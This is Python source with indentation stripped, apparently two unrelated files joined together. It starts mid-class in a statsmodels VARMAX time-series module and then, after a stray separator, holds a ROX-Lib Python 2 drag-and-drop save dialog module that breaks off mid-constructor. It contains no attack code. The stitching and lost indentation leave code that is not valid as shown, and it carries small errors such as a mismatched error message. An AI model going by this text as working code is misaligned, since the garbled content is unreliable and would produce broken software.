offset = 0
self._params_trend, offset = _slice('trend', offset)
self._params_ar, offset = _slice('ar', offset)
self._params_ma, offset = _slice('ma', offset)
self._params_regression, offset = _slice('regression', offset)
self._params_state_cov, offset = _slice('state_cov', offset)
self._params_obs_cov, offset = _slice('obs_cov', offset)
def filter(self, params, **kwargs):
kwargs.setdefault('results_class', VARMAXResults)
kwargs.setdefault('results_wrapper_class', VARMAXResultsWrapper)
return super(VARMAX, self).filter(params, **kwargs)
def smooth(self, params, **kwargs):
kwargs.setdefault('results_class', VARMAXResults)
kwargs.setdefault('results_wrapper_class', VARMAXResultsWrapper)
return super(VARMAX, self).smooth(params, **kwargs)
@property
def start_params(self):
params = np.zeros(self.k_params, dtype=np.float64)
# A. Run a multivariate regression to get beta estimates
endog = self.endog.copy()
exog = self.exog.copy() if self.k_exog > 0 else None
# Although the Kalman filter can deal with missing values in endog,
# conditional sum of squares cannot
if np.any(np.isnan(endog)):
endog = endog[~np.isnan(endog)]
if exog is not None:
exog = exog[~np.isnan(endog)]
# Regression effects via OLS
exog_params = np.zeros(0)
if self.k_exog > 0:
exog_params = np.linalg.pinv(exog).dot(endog).T
endog -= np.dot(exog, exog_params.T)
# B. Run a VAR model on endog to get trend, AR parameters
ar_params = []
k_ar = self.k_ar if self.k_ar > 0 else 1
mod_ar = var_model.VAR(endog)
res_ar = mod_ar.fit(maxlags=k_ar, ic=None, trend=self.trend)
ar_params = np.array(res_ar.params.T)
if self.trend == 'c':
trend_params = ar_params[:, 0]
if self.k_ar > 0:
ar_params = ar_params[:, 1:].ravel()
else:
ar_params = []
elif self.k_ar > 0:
ar_params = ar_params.ravel()
else:
ar_params = []
endog = res_ar.resid
# Test for stationarity
if self.k_ar > 0 and self.enforce_stationarity:
coefficient_matrices = (
ar_params.reshape(
self.k_endog * self.k_ar, self.k_endog
).T
).reshape(self.k_endog, self.k_endog, self.k_ar).T
stationary = is_invertible([1] + list(-coefficient_matrices))
if not stationary:
raise ValueError('Non-stationary starting autoregressive'
' parameters found with `enforce_stationarity`'
' set to True.')
# C. Run a VAR model on the residuals to get MA parameters
ma_params = []
if self.k_ma > 0:
mod_ma = var_model.VAR(endog)
res_ma = mod_ma.fit(maxlags=self.k_ma, ic=None, trend='nc')
ma_params = np.array(res_ma.params.T).ravel()
# Test for invertibility
if self.enforce_invertibility:
coefficient_matrices = (
ma_params.reshape(
self.k_endog * self.k_ma, self.k_endog
).T
).reshape(self.k_endog, self.k_endog, self.k_ma).T
invertible = is_invertible([1] + list(-coefficient_matrices))
if not invertible:
raise ValueError('Non-invertible starting moving-average'
' parameters found with `enforce_stationarity`'
' set to True.')
# 1. Intercept terms
if self.trend == 'c':
params[self._params_trend] = trend_params
# 2. AR terms
params[self._params_ar] = ar_params
# 3. MA terms
params[self._params_ma] = ma_params
# 4. Regression terms
if self.mle_regression:
params[self._params_regression] = exog_params.ravel()
# 5. State covariance terms
if self.error_cov_type == 'diagonal':
params[self._params_state_cov] = res_ar.sigma_u.diagonal()
elif self.error_cov_type == 'unstructured':
cov_factor = np.linalg.cholesky(res_ar.sigma_u)
params[self._params_state_cov] = (
cov_factor[self._idx_lower_state_cov].ravel())
# 5. Measurement error variance terms
if self.measurement_error:
if self.k_ma > 0:
params[self._params_obs_cov] = res_ma.sigma_u.diagonal()
else:
params[self._params_obs_cov] = res_ar.sigma_u.diagonal()
return params
@property
def param_names(self):
param_names = []
# 1. Intercept terms
if self.trend == 'c':
param_names += [
'const.%s' % self.endog_names[i]
for i in range(self.k_endog)
]
# 2. AR terms
param_names += [
'L%d.%s.%s' % (i+1, self.endog_names[k], self.endog_names[j])
for j in range(self.k_endog)
for i in range(self.k_ar)
for k in range(self.k_endog)
]
# 3. MA terms
param_names += [
'L%d.e(%s).%s' % (i+1, self.endog_names[k], self.endog_names[j])
for j in range(self.k_endog)
for i in range(self.k_ma)
for k in range(self.k_endog)
]
# 4. Regression terms
param_names += [
'beta.%s.%s' % (self.exog_names[j], self.endog_names[i])
for i in range(self.k_endog)
for j in range(self.k_exog)
]
# 5. State covariance terms
if self.error_cov_type == 'diagonal':
param_names += [
'sigma2.%s' % self.endog_names[i]
for i in range(self.k_endog)
]
elif self.error_cov_type == 'unstructured':
param_names += [
('sqrt.var.%s' % self.endog_names[i] if i == j else
'sqrt.cov.%s.%s' % (self.endog_names[j], self.endog_names[i]))
for i in range(self.k_endog)
for j in range(i+1)
]
# 5. Measurement error variance terms
if self.measurement_error:
param_names += [
'measurement_variance.%s' % self.endog_names[i]
for i in range(self.k_endog)
]
return param_names
def transform_params(self, unconstrained):
"""
Transform unconstrained parameters used by the optimizer to constrained
parameters used in likelihood evaluation
Parameters
----------
unconstrained : array_like
Array of unconstrained parameters used by the optimizer, to be
transformed.
Returns
-------
constrained : array_like
Array of constrained parameters which may be used in likelihood
evalation.
Notes
-----
Constrains the factor transition to be stationary and variances to be
positive.
"""
unconstrained = np.array(unconstrained, ndmin=1)
constrained = np.zeros(unconstrained.shape, dtype=unconstrained.dtype)
# 1. Intercept terms: nothing to do
constrained[self._params_trend] = unconstrained[self._params_trend]
# 2. AR terms: optionally force to be stationary
if self.k_ar > 0 and self.enforce_stationarity:
# Create the state covariance matrix
if self.error_cov_type == 'diagonal':
state_cov = np.diag(unconstrained[self._params_state_cov]**2)
elif self.error_cov_type == 'unstructured':
state_cov_lower = np.zeros(self.ssm['state_cov'].shape,
dtype=unconstrained.dtype)
state_cov_lower[self._idx_lower_state_cov] = (
unconstrained[self._params_state_cov])
state_cov = np.dot(state_cov_lower, state_cov_lower.T)
# Transform the parameters
coefficients = unconstrained[self._params_ar].reshape(
self.k_endog, self.k_endog * self.k_ar)
coefficient_matrices, variance = (
constrain_stationary_multivariate(coefficients, state_cov))
constrained[self._params_ar] = coefficient_matrices.ravel()
else:
constrained[self._params_ar] = unconstrained[self._params_ar]
# 3. MA terms: optionally force to be invertible
if self.k_ma > 0 and self.enforce_invertibility:
# Transform the parameters, using an identity variance matrix
state_cov = np.eye(self.k_endog, dtype=unconstrained.dtype)
coefficients = unconstrained[self._params_ma].reshape(
self.k_endog, self.k_endog * self.k_ma)
coefficient_matrices, variance = (
constrain_stationary_multivariate(coefficients, state_cov))
constrained[self._params_ma] = coefficient_matrices.ravel()
else:
constrained[self._params_ma] = unconstrained[self._params_ma]
# 4. Regression terms: nothing to do
constrained[self._params_regression] = (
unconstrained[self._params_regression])
# 5. State covariance terms
# If we have variances, force them to be positive
if self.error_cov_type == 'diagonal':
constrained[self._params_state_cov] = (
unconstrained[self._params_state_cov]**2)
# Otherwise, nothing needs to be done
elif self.error_cov_type == 'unstructured':
constrained[self._params_state_cov] = (
unconstrained[self._params_state_cov])
# 5. Measurement error variance terms
if self.measurement_error:
# Force these to be positive
constrained[self._params_obs_cov] = (
unconstrained[self._params_obs_cov]**2)
return constrained
def untransform_params(self, constrained):
"""
Transform constrained parameters used in likelihood evaluation
to unconstrained parameters used by the optimizer.
Parameters
----------
constrained : array_like
Array of constrained parameters used in likelihood evalution, to be
transformed.
Returns
-------
unconstrained : array_like
Array of unconstrained parameters used by the optimizer.
"""
constrained = np.array(constrained, ndmin=1)
unconstrained = np.zeros(constrained.shape, dtype=constrained.dtype)
# 1. Intercept terms: nothing to do
unconstrained[self._params_trend] = constrained[self._params_trend]
# 2. AR terms: optionally were forced to be stationary
if self.k_ar > 0 and self.enforce_stationarity:
# Create the state covariance matrix
if self.error_cov_type == 'diagonal':
state_cov = np.diag(constrained[self._params_state_cov])
elif self.error_cov_type == 'unstructured':
state_cov_lower = np.zeros(self.ssm['state_cov'].shape,
dtype=constrained.dtype)
state_cov_lower[self._idx_lower_state_cov] = (
constrained[self._params_state_cov])
state_cov = np.dot(state_cov_lower, state_cov_lower.T)
# Transform the parameters
coefficients = constrained[self._params_ar].reshape(
self.k_endog, self.k_endog * self.k_ar)
unconstrained_matrices, variance = (
unconstrain_stationary_multivariate(coefficients, state_cov))
unconstrained[self._params_ar] = unconstrained_matrices.ravel()
else:
unconstrained[self._params_ar] = constrained[self._params_ar]
# 3. MA terms: optionally were forced to be invertible
if self.k_ma > 0 and self.enforce_invertibility:
# Transform the parameters, using an identity variance matrix
state_cov = np.eye(self.k_endog, dtype=constrained.dtype)
coefficients = constrained[self._params_ma].reshape(
self.k_endog, self.k_endog * self.k_ma)
unconstrained_matrices, variance = (
unconstrain_stationary_multivariate(coefficients, state_cov))
unconstrained[self._params_ma] = unconstrained_matrices.ravel()
else:
unconstrained[self._params_ma] = constrained[self._params_ma]
# 4. Regression terms: nothing to do
unconstrained[self._params_regression] = (
constrained[self._params_regression])
# 5. State covariance terms
# If we have variances, then these were forced to be positive
if self.error_cov_type == 'diagonal':
unconstrained[self._params_state_cov] = (
constrained[self._params_state_cov]**0.5)
# Otherwise, nothing needs to be done
elif self.error_cov_type == 'unstructured':
unconstrained[self._params_state_cov] = (
constrained[self._params_state_cov])
# 5. Measurement error variance terms
if self.measurement_error:
# These were forced to be positive
unconstrained[self._params_obs_cov] = (
constrained[self._params_obs_cov]**0.5)
return unconstrained
def update(self, params, **kwargs):
params = super(VARMAX, self).update(params, **kwargs)
# 1. State intercept
if self.mle_regression:
exog_params = params[self._params_regression].reshape(
self.k_endog, self.k_exog).T
intercept = np.dot(self.exog, exog_params)
if self.trend == 'c':
intercept += params[self._params_trend]
self.ssm[self._idx_state_intercept] = intercept.T
elif self.trend == 'c':
self.ssm[self._idx_state_intercept] = params[self._params_trend]
# 2. Transition
ar = params[self._params_ar].reshape(
self.k_endog, self.k_endog * self.k_ar)
ma = params[self._params_ma].reshape(
self.k_endog, self.k_endog * self.k_ma)
self.ssm[self._idx_transition] = np.c_[ar, ma]
# 3. State covariance
if self.error_cov_type == 'diagonal':
self.ssm[self._idx_state_cov] = (
params[self._params_state_cov]
)
elif self.error_cov_type == 'unstructured':
state_cov_lower = np.zeros(self.ssm['state_cov'].shape,
dtype=params.dtype)
state_cov_lower[self._idx_lower_state_cov] = (
params[self._params_state_cov])
self.ssm['state_cov'] = np.dot(state_cov_lower, state_cov_lower.T)
# 4. Observation covariance
if self.measurement_error:
self.ssm[self._idx_obs_cov] = params[self._params_obs_cov]
class VARMAXResults(MLEResults):
"""
Class to hold results from fitting an VARMAX model.
Parameters
----------
model : VARMAX instance
The fitted model instance
Attributes
----------
specification : dictionary
Dictionary including all attributes from the VARMAX model instance.
coefficient_matrices_var : array
Array containing autoregressive lag polynomial coefficient matrices,
ordered from lowest degree to highest.
coefficient_matrices_vma : array
Array containing moving average lag polynomial coefficients,
ordered from lowest degree to highest.
See Also
--------
statsmodels.tsa.statespace.kalman_filter.FilterResults
statsmodels.tsa.statespace.mlemodel.MLEResults
"""
def __init__(self, model, params, filter_results, cov_type='opg',
**kwargs):
super(VARMAXResults, self).__init__(model, params, filter_results,
cov_type, **kwargs)
self.df_resid = np.inf # attribute required for wald tests
self.specification = Bunch(**{
# Set additional model parameters
'error_cov_type': self.model.error_cov_type,
'measurement_error': self.model.measurement_error,
'enforce_stationarity': self.model.enforce_stationarity,
'enforce_invertibility': self.model.enforce_invertibility,
'order': self.model.order,
# Model order
'k_ar': self.model.k_ar,
'k_ma': self.model.k_ma,
# Trend / Regression
'trend': self.model.trend,
'k_trend': self.model.k_trend,
'k_exog': self.model.k_exog,
})
# Polynomials / coefficient matrices
self.coefficient_matrices_var = None
self.coefficient_matrices_vma = None
if self.model.k_ar > 0:
ar_params = np.array(self.params[self.model._params_ar])
k_endog = self.model.k_endog
k_ar = self.model.k_ar
self.coefficient_matrices_var = (
ar_params.reshape(k_endog * k_ar, k_endog).T
).reshape(k_endog, k_endog, k_ar).T
if self.model.k_ma > 0:
ma_params = np.array(self.params[self.model._params_ma])
k_endog = self.model.k_endog
k_ma = self.model.k_ma
self.coefficient_matrices_vma = (
ma_params.reshape(k_endog * k_ma, k_endog).T
).reshape(k_endog, k_endog, k_ma).T
def predict(self, start=None, end=None, exog=None, dynamic=False,
**kwargs):
"""
In-sample prediction and out-of-sample forecasting
Parameters
----------
start : int, str, or datetime, optional
Zero-indexed observation number at which to start forecasting, ie.,
the first forecast is start. Can also be a date string to
parse or a datetime type. Default is the the zeroth observation.
end : int, str, or datetime, optional
Zero-indexed observation number at which to end forecasting, ie.,
the first forecast is start. Can also be a date string to
parse or a datetime type. However, if the dates index does not
have a fixed frequency, end must be an integer index if you
want out of sample prediction. Default is the last observation in
the sample.
exog : array_like, optional
If the model includes exogenous regressors, you must provide
exactly enough out-of-sample values for the exogenous variables if
end is beyond the last observation in the sample.
dynamic : boolean, int, str, or datetime, optional
Integer offset relative to `start` at which to begin dynamic
prediction. Can also be an absolute date string to parse or a
datetime type (these are not interpreted as offsets).
Prior to this observation, true endogenous values will be used for
prediction; starting with this observation and continuing through
the end of prediction, forecasted endogenous values will be used
instead.
**kwargs
Additional arguments may required for forecasting beyond the end
of the sample. See `FilterResults.predict` for more details.
Returns
-------
forecast : array
Array of out of sample forecasts.
"""
if start is None:
start = 0
# Handle end (e.g. date)
_start = self.model._get_predict_start(start)
_end, _out_of_sample = self.model._get_predict_end(end)
# Handle exogenous parameters
if _out_of_sample and (self.model.k_exog + self.model.k_trend > 0):
# Create a new faux VARMAX model for the extended dataset
nobs = self.model.data.orig_endog.shape[0] + _out_of_sample
endog = np.zeros((nobs, self.model.k_endog))
if self.model.k_exog > 0:
if exog is None:
raise ValueError('Out-of-sample forecasting in a model'
' with a regression component requires'
' additional exogenous values via the'
' `exog` argument.')
exog = np.array(exog)
required_exog_shape = (_out_of_sample, self.model.k_exog)
if not exog.shape == required_exog_shape:
raise ValueError('Provided exogenous values are not of the'
' appropriate shape. Required %s, got %s.'
% (str(required_exog_shape),
str(exog.shape)))
exog = np.c_[self.model.data.orig_exog.T, exog.T].T
# TODO replace with init_kwds or specification or similar
model = VARMAX(
endog,
exog=exog,
order=self.model.order,
trend=self.model.trend,
error_cov_type=self.model.error_cov_type,
measurement_error=self.model.measurement_error,
enforce_stationarity=self.model.enforce_stationarity,
enforce_invertibility=self.model.enforce_invertibility
)
model.update(self.params)
# Set the kwargs with the update time-varying state space
# representation matrices
for name in self.filter_results.shapes.keys():
if name == 'obs':
continue
mat = getattr(model.ssm, name)
if mat.shape[-1] > 1:
if len(mat.shape) == 2:
kwargs[name] = mat[:, -_out_of_sample:]
else:
kwargs[name] = mat[:, :, -_out_of_sample:]
elif self.model.k_exog == 0 and exog is not None:
warn('Exogenous array provided to predict, but additional data not'
' required. `exog` argument ignored.', ValueWarning)
return super(VARMAXResults, self).predict(
start=start, end=end, exog=exog, dynamic=dynamic, **kwargs
)
def forecast(self, steps=1, exog=None, **kwargs):
"""
Out-of-sample forecasts
Parameters
----------
steps : int, optional
The number of out of sample forecasts from the end of the
sample. Default is 1.
exog : array_like, optional
If the model includes exogenous regressors, you must provide
exactly enough out-of-sample values for the exogenous variables for
each step forecasted.
**kwargs
Additional arguments may required for forecasting beyond the end
of the sample. See `FilterResults.predict` for more details.
Returns
-------
forecast : array
Array of out of sample forecasts.
"""
return super(VARMAXResults, self).forecast(steps, exog=exog, **kwargs)
def summary(self, alpha=.05, start=None, separate_params=True):
from statsmodels.iolib.summary import summary_params
# Create the model name
spec = self.specification
if spec.k_ar > 0 and spec.k_ma > 0:
model_name = 'VARMA'
order = '(%s,%s)' % (spec.k_ar, spec.k_ma)
elif spec.k_ar > 0:
model_name = 'VAR'
order = '(%s)' % (spec.k_ar)
else:
model_name = 'VMA'
order = '(%s)' % (spec.k_ma)
if spec.k_exog > 0:
model_name += 'X'
model_name = [model_name + order]
if spec.trend == 'c':
model_name.append('intercept')
if spec.measurement_error:
model_name.append('measurement error')
summary = super(VARMAXResults, self).summary(
alpha=alpha, start=start, model_name=model_name,
display_params=not separate_params
)
if separate_params:
indices = np.arange(len(self.params))
def make_table(self, mask, title, strip_end=True):
res = (self, self.params[mask], self.bse[mask],
self.zvalues[mask], self.pvalues[mask],
self.conf_int(alpha)[mask])
param_names = [
'.'.join(name.split('.')[:-1]) if strip_end else name
for name in
np.array(self.data.param_names)[mask].tolist()
]
return summary_params(res, yname=None, xname=param_names,
alpha=alpha, use_t=False, title=title)
# Add parameter tables for each endogenous variable
k_endog = self.model.k_endog
k_ar = self.model.k_ar
k_ma = self.model.k_ma
k_exog = self.model.k_exog
endog_masks = []
for i in range(k_endog):
masks = []
offset = 0
# 1. Intercept terms
if self.model.trend == 'c':
masks.append(np.array(i, ndmin=1))
offset += k_endog
# 2. AR terms
if k_ar > 0:
start = i * k_endog * k_ar
end = (i + 1) * k_endog * k_ar
masks.append(
offset + np.arange(start, end))
offset += k_ar * k_endog**2
# 3. MA terms
if k_ma > 0:
start = i * k_endog * k_ma
end = (i + 1) * k_endog * k_ma
masks.append(
offset + np.arange(start, end))
offset += k_ma * k_endog**2
# 4. Regression terms
if k_exog > 0:
masks.append(
offset + np.arange(i * k_exog, (i + 1) * k_exog))
offset += k_endog * k_exog
# 5. Measurement error variance terms
if self.model.measurement_error:
masks.append(np.array(self.model.k_params - i - 1, ndmin=1))
# Create the table
mask = np.concatenate(masks)
endog_masks.append(mask)
title = "Results for equation %s" % self.model.endog_names[i]
table = make_table(self, mask, title)
summary.tables.append(table)
# State covariance terms
state_cov_mask = (
np.arange(len(self.params))[self.model._params_state_cov])
table = make_table(self, state_cov_mask, "Error covariance matrix",
strip_end=False)
summary.tables.append(table)
# Add a table for all other parameters
masks = []
for m in (endog_masks, [state_cov_mask]):
m = np.array(m).flatten()
if len(m) > 0:
masks.append(m)
masks = np.concatenate(masks)
inverse_mask = np.array(list(set(indices).difference(set(masks))))
if len(inverse_mask) > 0:
table = make_table(self, inverse_mask, "Other parameters",
strip_end=False)
summary.tables.append(table)
return summary
summary.__doc__ = MLEResults.summary.__doc__
class VARMAXResultsWrapper(MLEResultsWrapper):
_attrs = {}
_wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
_attrs)
_methods = {}
_wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
_methods)
wrap.populate_wrapper(VARMAXResultsWrapper, VARMAXResults)
| |
"""All ROX applications that can save documents should use drag-and-drop saving.
The document itself should use the Saveable mix-in class and override some of the
methods to actually do the save.
If you want to save a selection then you can create a new object specially for
the purpose and pass that to the SaveBox."""
import os, sys
import rox
from rox import alert, info, g, _, filer, escape
from rox import choices, get_local_path
gdk = g.gdk
TARGET_XDS = 0
TARGET_RAW = 1
def _write_xds_property(context, value):
win = context.source_window
if value:
win.property_change('XdndDirectSave0', 'text/plain', 8,
gdk.PROP_MODE_REPLACE,
value)
else:
win.property_delete('XdndDirectSave0')
def _read_xds_property(context, delete):
win = context.source_window
retval = win.property_get('XdndDirectSave0', 'text/plain', delete)
if retval:
return retval[2]
return None
def image_for_type(type):
'Search <Choices> for a suitable icon. Returns a pixbuf, or None.'
from icon_theme import rox_theme
media, subtype = type.split('/', 1)
path = choices.load('MIME-icons', media + '_' + subtype + '.png')
if not path:
icon = 'mime-%s:%s' % (media, subtype)
try:
path = rox_theme.lookup_icon(icon, 48)
if not path:
icon = 'mime-%s' % media
path = rox_theme.lookup_icon(icon, 48)
except:
print "Error loading MIME icon"
if not path:
path = choices.load('MIME-icons', media + '.png')
if path:
return gdk.pixbuf_new_from_file(path)
else:
return None
def _report_save_error():
"Report a SaveAbort nicely, otherwise use report_exception()"
type, value = sys.exc_info()[:2]
if isinstance(value, AbortSave):
value.show()
else:
rox.report_exception()
class AbortSave(Exception):
"""Raise this to cancel a save. If a message is given, it is displayed
in a normal alert box (not in the report_exception style). If the
message is None, no message is shown (you should have already shown
it!)"""
def __init__(self, message):
self.message = message
def show(self):
if self.message:
rox.alert(self.message)
class Saveable:
"""This class describes the interface that an object must provide
to work with the SaveBox/SaveArea widgets. Inherit from it if you
want to save. All methods can be overridden, but normally only
save_to_stream() needs to be. You can also set save_last_stat to
the result of os.stat(filename) when loading a file to make ROX-Lib
restore permissions and warn about other programs editing the file."""
save_last_stat = None
def set_uri(self, uri):
"""When the data is safely saved somewhere this is called
with its new name. Mark your data as unmodified and update
the filename for next time. Saving to another application
won't call this method. Default method does nothing."""
pass
def save_to_stream(self, stream):
"""Write the data to save to the stream. When saving to a
local file, stream will be the actual file, otherwise it is a
cStringIO object."""
raise Exception('You forgot to write the save_to_stream() method...'
'silly programmer!')
def save_to_file(self, path):
"""Write data to file. Raise an exception on error.
The default creates a temporary file, uses save_to_stream() to
write to it, then renames it over the original. If the temporary file
can't be created, it writes directly over the original."""
# Ensure the directory exists...
dir = os.path.dirname(path)
if not os.path.isdir(dir):
from rox import fileutils
try:
fileutils.makedirs(dir)
except OSError:
raise AbortSave(None) # (message already shown)
import random
tmp = 'tmp-' + `random.randrange(1000000)`
tmp = os.path.join(dir, tmp)
def open(path):
return os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0600), 'wb')
try:
file = open(tmp)
except:
# Can't create backup... try a direct write
tmp = None
file = open(path)
try:
try:
self.save_to_stream(file)
finally:
file.close()
if tmp:
os.rename(tmp, path)
except:
_report_save_error()
if tmp and os.path.exists(tmp):
if os.path.getsize(tmp) == 0 or \
rox.confirm(_("Delete temporary file '%s'?") % tmp,
g.STOCK_DELETE):
os.unlink(tmp)
raise AbortSave(None)
self.save_set_permissions(path)
filer.examine(path)
def save_to_selection(self, selection_data):
"""Write data to the selection. The default method uses save_to_stream()."""
from cStringIO import StringIO
stream = StringIO()
self.save_to_stream(stream)
selection_data.set(selection_data.target, 8, stream.getvalue())
save_mode = None # For backwards compat
def save_set_permissions(self, path):
"""The default save_to_file() creates files with the mode 0600
(user read/write only). After saving has finished, it calls this
method to set the final permissions. The save_set_permissions():
- sets it to 0666 masked with the umask (if save_mode is None), or
- sets it to save_last_stat.st_mode (not masked) otherwise."""
if self.save_last_stat is not None:
save_mode = self.save_last_stat.st_mode
else:
save_mode = self.save_mode
if save_mode is not None:
os.chmod(path, save_mode)
else:
mask = os.umask(0077) # Get the current umask
os.umask(mask) # Set it back how it was
os.chmod(path, 0666 & ~mask)
def save_done(self):
"""Time to close the savebox. Default method does nothing."""
pass
def discard(self):
"""Discard button clicked, or document safely saved. Only called if a SaveBox
was created with discard=1.
The user doesn't want the document any more, even if it's modified and unsaved.
Delete it."""
raise Exception("Sorry... my programmer forgot to tell me how to handle Discard!")
save_to_stream._rox_default = 1
save_to_file._rox_default = 1
save_to_selection._rox_default = 1
def can_save_to_file(self):
"""Indicates whether we have a working save_to_stream or save_to_file
method (ie, whether we can save to files). Default method checks that
one of these two methods has been overridden."""
if not hasattr(self.save_to_stream, '_rox_default'):
return 1 # Have user-provided save_to_stream
if not hasattr(self.save_to_file, '_rox_default'):
return 1 # Have user-provided save_to_file
return 0
def can_save_to_selection(self):
"""Indicates whether we have a working save_to_stream or save_to_selection
method (ie, whether we can save to selections). Default methods checks that
one of these two methods has been overridden."""
if not hasattr(self.save_to_stream, '_rox_default'):
return 1 # Have user-provided save_to_stream
if not hasattr(self.save_to_selection, '_rox_default'):
return 1 # Have user-provided save_to_file
return 0
def save_cancelled(self):
"""If you multitask during a save (using a recursive mainloop) then the
user may click on the Cancel button. This function gets called if so, and
should cause the recursive mainloop to return."""
raise Exception("Lazy programmer error: can't abort save!")
class SaveArea(g.VBox):
"""A SaveArea contains the widgets used in a save box. You can use
this to put a savebox area in a larger window."""
def __init__(self, document, uri, type):
"""'document' must be a subclass of Saveable.
'uri' is the file's current location, or a simple name (eg 'TextFile')
if it has never been saved.
'type' is the MIME-type to use (eg 'text/plain').
"""
g.VBox.__init__(self, False, 0)
self.document = document
self.initial_uri = uri
drag_area = self._create_drag_area(type)
self.pack_start(drag_area, True, True, 0)
drag_area.show_all()
entry = g.Entry()
entry.connect('activate', lambda w: self.save_to_file_in_entry())
self.entry = entry
self.pack_start(entry, False, True, 4)
entry.show()
entry.set_text(uri)
def _set_icon(self, type):
pixbuf = image_for_type(type)
if pixbuf:
self.icon.set_from_pixbuf(pixbuf)
else:
self.icon.set_from_stock(g.STOCK_MISSING_IMAGE, g.ICON_SIZE_DND)
def _create_drag_area(self, type):
align = g.Alignment()
align.set(.5, .5, 0, 0)
self.drag_box = g.EventBox()
self.drag_box.set_border_width(4)
self.drag_box.add_events(gdk.BUTTON_PRESS_MASK)
align.add(self.drag_box)
self.icon = g.Image()
self._set_icon(type)
self._set_drag_source(type)
self.drag_box.connect('drag_begin', self.drag_begin)
self.drag_box.connect('drag_end', self.drag_end)
self.drag_box.connect('drag_data_get', self.drag_data_get)
self.drag_in_progress = 0
self.drag_box.add(self.icon)
return align
def set_type(self, type, icon = None):
"""Change the icon and drag target to 'type'.
If 'icon' is given (as a GtkImage) then that icon is used,
otherwise an appropriate icon for the type is used."""
if icon:
self.icon.set_from_pixbuf(icon.get_pixbuf())
else:
self._set_icon(type)
self._set_drag_source(type)
def _set_drag_source(self, type):
if self.document.can_save_to_file():
targets = [('XdndDirectSave0', 0, TARGET_XDS)]
else:
targets = []
if self.document.can_save_to_selection():
targets = targets + [(type, 0, TARGET_RAW),
('application/octet-stream', 0, TARGET_RAW)]
if not targets:
raise Exception("Document %s can't save!" % self.document)
self.drag_box.drag_source_set(gdk.BUTTON1_MASK | gdk.BUTTON3_MASK,
targets,
gdk.ACTION_COPY | gdk.ACTION_MOVE)
def save_to_file_in_entry(self):
"""Call this when the user clicks on an OK button you provide."""
uri = self.entry.get_text()
path = get_local_path(escape(uri))
if path:
if not self.confirm_new_path(path):
return
try:
self.set_sensitive(False)
try:
self.document.save_to_file(path)
finally:
self.set_sensitive(True)
self.set_uri(path)
self.save_done()
except:
_report_save_error()
else:
rox.info(_("Drag the icon to a directory viewer\n"
"(or enter a full pathname)"))
def drag_begin(self, drag_box, context):
self.drag_in_progress = 1
self.destroy_on_drag_end = 0
self.using_xds = 0
self.data_sent = 0
try:
pixbuf = self.icon.get_pixbuf()
if pixbuf:
drag_box.drag_source_set_icon_pixbuf(pixbuf)
except:
# This can happen if we set the broken image...
import traceback
traceback.print_exc()
uri = self.entry.get_text()
if uri:
i = uri.rfind('/')
if (i == -1):
leaf = uri
else:
leaf = uri[i + 1:]
else:
leaf = _('Unnamed')
_write_xds_property(context, leaf)
def drag_data_get(self, widget, context, selection_data, info, time):
if info == TARGET_RAW:
try:
self.set_sensitive(False)
try:
self.document.save_to_selection(selection_data)
finally:
self.set_sensitive(True)
except:
_report_save_error()
_write_xds_property(context, None)
return
self.data_sent = 1
_write_xds_property(context, None)
if self.drag_in_progress:
self.destroy_on_drag_end = 1
else:
self.save_done()
return
elif info != TARGET_XDS:
_write_xds_property(context, None)
alert("Bad target requested!")
return
# Using XDS:
#
# Get the path that the destination app wants us to save to.
# If it's local, save and return Success
# (or Error if save fails)
# If it's remote, return Failure (remote may try another method)
# If no URI is given, return Error
to_send = 'E'
uri = _read_xds_property(context, False)
if uri:
path = get_local_path(uri)
if path:
if not self.confirm_new_path(path):
to_send = 'E'
else:
try:
self.set_sensitive(False)
try:
self.document.save_to_file(path)
finally:
self.set_sensitive(True)
self.data_sent = True
except:
_report_save_error()
self.data_sent = False
if self.data_sent:
to_send = 'S'
# (else Error)
else:
to_send = 'F' # Non-local transfer
else:
alert("Remote application wants to use " +
"Direct Save, but I can't read the " +
"XdndDirectSave0 (type text/plain) " +
"property.")
selection_data.set(selection_data.target, 8, to_send)
if to_send != 'E':
_write_xds_property(context, None)
path = get_local_path(uri)
if path:
self.set_uri(path)
else:
self.set_uri(uri)
if self.data_sent:
self.save_done()
def confirm_new_path(self, path):
"""User wants to save to this path. If it's different to the original path,
check that it doesn't exist and ask for confirmation if it does.
If document.save_last_stat is set, compare with os.stat for an existing file
and warn about changes.
Returns true to go ahead with the save."""
if not os.path.exists(path):
return True
if path == self.initial_uri:
if self.document.save_last_stat is None:
return True # OK. Nothing to compare with.
last = self.document.save_last_stat
stat = os.stat(path)
msg = []
if stat.st_mode != last.st_mode:
msg.append(_("Permissions changed from %o to %o.") % \
(last.st_mode, stat.st_mode))
if stat.st_size != last.st_size:
msg.append(_("Size was %d bytes; now %d bytes.") % \
(last.st_size, stat.st_size))
if stat.st_mtime != last.st_mtime:
msg.append(_("Modification time changed."))
if not msg:
return True # No change detected
return rox.confirm("File '%s' edited by another program since last load/save. "
"Really save (discarding other changes)?\n\n%s" %
(path, '\n'.join(msg)), g.STOCK_DELETE)
return rox.confirm(_("File '%s' already exists -- overwrite it?") % path,
g.STOCK_DELETE, _('_Overwrite'))
def set_uri(self, uri):
"""Data is safely saved somewhere. Update the document's URI and save_last_stat (for local saves).
Internal."""
path = get_local_path(uri)
if path is not None:
self.document.save_last_stat = os.stat(path) # Record for next time
self.document.set_uri(uri)
def drag_end(self, widget, context):
self.drag_in_progress = 0
if self.destroy_on_drag_end:
self.save_done()
def save_done(self):
self.document.save_done()
class SaveBox(g.Dialog):
"""A SaveBox is a GtkDialog that contains a SaveArea and, optionally, a Discard button.
Calls rox.toplevel_(un)ref automatically.
"""
def __init__(self, document, uri, type = 'text/plain', discard = False):
"""See SaveArea.__init__.
If discard is True then an extra discard button is added to the dialog."""
g.Dialog.__init__(self)
self.set_has_separator(False)
self.add_button(g.STOCK_CANCEL, g.RESPONSE_CANCEL)
self.add_button(g.STOCK_SAVE, g.RESPONSE_OK)
self.set_default_response(g.RESPONSE_OK)
if discard:
discard_area = g.HButtonBox()
def discard_clicked(event):
document.discard()
self.destroy()
button = rox.ButtonMixed(g.STOCK_DELETE, _('_Discard'))
discard_area.pack_start(button, False, True, 2)
button.connect('clicked', discard_clicked)
button.unset_flags(g.CAN_FOCUS)
button.set_flags(g.CAN_DEFAULT)
self.vbox.pack_end(discard_area, False, True, 0)
self.vbox.reorder_child(discard_area, 0)
discard_area.show_all()
self.set_title(_('Save As:'))
